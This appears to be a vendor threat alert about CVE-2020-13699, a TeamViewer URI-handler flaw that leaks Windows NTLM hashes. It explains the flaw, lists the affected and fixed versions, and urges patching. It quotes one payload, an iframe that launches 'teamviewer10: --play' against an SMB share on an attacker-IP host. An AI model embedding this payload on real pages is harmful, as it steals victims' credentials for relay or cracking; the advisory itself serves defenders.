Threat Alert

by IthacaLabs™

THREAT LEVEL/High 10/08/2020

New TeamViewer Flaw Allows Attackers To Steal System Password Remotely

Threat Level Description

Threat Level: High - An attack is highly likely. Additional and sustainable protective security measures reflecting the broad nature of the threat combined with specific business and geographical vulnerabilities and judgments on acceptable risk.

Description

We have observed that a new high risk vulnerability, affecting the TeamViewer remote access software, has been identified.

This flaw (CVE-2020-13699) resides in the way TeamViewer quotes its custom URI handlers, which could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system. A remote unauthenticated attacker, by exploiting this vulnerability, could gain system’s password and eventually compromise it.

Note that the attack can be executed almost automatically, just by convincing the victim to visit a malicious web page once.

In order to successfully exploit the vulnerability, a malicious actor needs to embed a malicious iframe on a website (iframe src=’teamviewer10: –play \attacker-IPsharefake.tvs’) and then trick victims into visiting that maliciously crafted URL. Once clicked by the victim, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.

When opening the SMB share, the victim’s system will perform a NTLM authentication and that request can be relayed by the attacker for code execution or hash cracking.

The flaw can be initiated remotely, requires no previous authentication and seems ideal for targeted watering hole attacks.

Though the vulnerability is not being exploited in the wild as of now, considering the popularity of the software among millions of users, TeamViewer has always been a target of interest for attackers.

CVE(s)

CVE-2020-13699

BASE SCORE: 6.8 Medium
VECTOR: (AV:N/AC:M/Au:N/C:P/I:P/A:P)

TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.

Affected Systems

  • TeamViewer for Windows < 15.8.3
  • Recommendation(s)

    You should immediately proceed and update to the latest version of TeamViewer.

    You should understand the importance of security updates, and the urgency with which they should be applied, no matter how large or small your organization is. It is very important to apply an efficient patch management solution and always have enabled an active event security logging and practice event monitoring. To protect the valuable assets of your business and be compliant with the relevant industry regulations requires a comprehensive approach to the management of risk, including Penetration Testing at least annually and upon significant changes.

    References

    Get the latest Threat Alerts in your inbox.